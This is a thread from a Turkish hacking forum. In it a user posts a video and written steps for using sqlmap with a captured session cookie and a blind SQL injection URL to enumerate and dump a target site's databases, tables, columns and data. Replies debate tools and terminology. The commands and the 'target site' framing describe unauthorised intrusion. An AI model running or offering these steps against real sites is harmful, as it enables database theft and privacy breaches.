Blind SQL & Cookie İnjection Açığı Kullanımı (Video)

meteduman · 28 Mar 2019

[ame]https://www.youtube.com/watch?v=EM8yFWZWpww[/ame]

İstek Üzerine yazılı kısa bir anlatım yapacagım arkadaşlar.
Hedef sitemizin cookie'sini çektiğinizi ve blind SQL-i açığını buldugunuzu varsayarak anlatımıma geçiyorum.Aslında tek yaptıgımız şey --cookie parametresi ile hedef sitenin cookiesini tanımlayıp blind açığımız ile hedef sitemizin veritabanına sızmaktı..

Peki nasıl yaptık ?

Burada cookie bilgisini ve Blind SQL-i açığını tanımladık ve veritabanını çektik.

Kod:

[COLOR=Yellow]sqlmap --cookie="cookiebilgisi" -u "Blind SQL-i" --dbs[/COLOR]

Burada çektiğimiz veritabanının içerisindeki tableları çektik.

Kod:

[COLOR=Yellow]sqlmap --cookie="cookiebilgisi" -u "Blind SQL-i" -D database --Tables[/COLOR]

Burada tableların içerisindeki Column'ları çektik.

Kod:

[COLOR=Yellow]sqlmap --cookie="cookiebilgisi" -u "Blind SQL-i" -D database -T tables --columns[/COLOR]

Son olarak columnlarımızın içerisindeki bilgiyi çekiyoruz.

Kod:

[COLOR=Yellow]sqlmap --cookie="cookiebilgisi" -u "Blind SQL-i" -D database -T tables -C columns --dump[/COLOR]

Anlamadıgınız olursa sorabilirsiniz.

Teşekkür Ederim.

korkusuzhacker2 · 28 Mar 2019

Devrem
Havij kullanirsan daha çok işine yarar

meteduman · 28 Mar 2019

korkusuzhacker2' Alıntı:
Devrem
Havij kullanirsan daha çok işine yarar

Video eğitim amaçlı kardom bilmeyenleri bilgilendirmek amacıyla çektiğim bir video bu ayrıca bu yöntemi havijle yapabiliceğine inanıyormusun

Purp · 28 Mar 2019

meteduman' Alıntı:
Video eğitim amaçlı kardom bilmeyenleri bilgilendirmek amacıyla çektiğim bir video bu ayrıca bu yöntemi havijle yapabiliceğine inanıyormusun

Havij mi ?

keşke cookies i nasıl çektiğini gösterseydin bilmeyenler veya soranlar olabilir :gozkirpan

meteduman · 28 Mar 2019

"PurpposoLes' Alıntı:
Havij mi ? Konu güzel olmuş keşke cookies i nasıl çektiğini gösterseydin bilmeyenler veya soranlar olabilir emeğine sağlık. :gozkirpan

Teşekkür ederim

bilgi analizleri için kullanılan programlar ve manuel açık kullanımları için ayrı bir video çekeceğim için göstermedim ama yeni video birkaç güne gelecek inşallah.

RuinHeart · 28 Mar 2019

Get parametresine atak yapmışsın dostum,cookie injection değil bu.Cookie injection dediğin zaman Cookie Parametresine Sql Payloadları Yazarsın ve Responsede dönen sonuçları incelersin.Sen sadece burda Cookie bilgisi girerek get parametresinden veritabınına ulaşmışsın.

meteduman · 28 Mar 2019

RuinHeart' Alıntı:
Get parametresine atak yapmışsın dostum,cookie injection değil bu.Cookie injection dediğin zaman Cookie Parametresine Sql Payloadları Yazarsın ve Responsede dönen sonuçları incelersin.Sen sadece burda Cookie bilgisi girerek get parametresinden veritabınına ulaşmışsın.

Senin bahsettiğin şey ile benim yaptıgım şey alakasız şeyler bahsettiğini anladım fakat bu yöntemede cookie injection deniyor bazı kaynaklarda bana ne yaptıgımı anlatmana gerek yok yani yapıp videosunu çektiğime göre ne yaptıgımıda biliyorum demekki değil mi kardom ?

cewl · 28 Mar 2019

merhaba konu gozel lap gozel olacakdi amma olmadi bi dusun yazili anlatsan bu videonuda alta eklesen ne kadar guzel olr dimi

meteduman · 28 Mar 2019

cewl' Alıntı:
merhaba konu gozel lap gozel olacakdi amma olmadi bi dusun yazili anlatsan bu videonuda alta eklesen ne kadar guzel olr dimi

Yazılı Anlatım eklendi .

Blind SQL & Cookie İnjection Açığı Kullanımı (Video)

meteduman

Üye

korkusuzhacker2

Üye

meteduman

Üye

Purp

Kıdemli Üye

meteduman

Üye

RuinHeart

Yeni üye

meteduman

Üye

cewl

Kıdemli Üye

meteduman

Üye

Sosyal medya sayfalarımız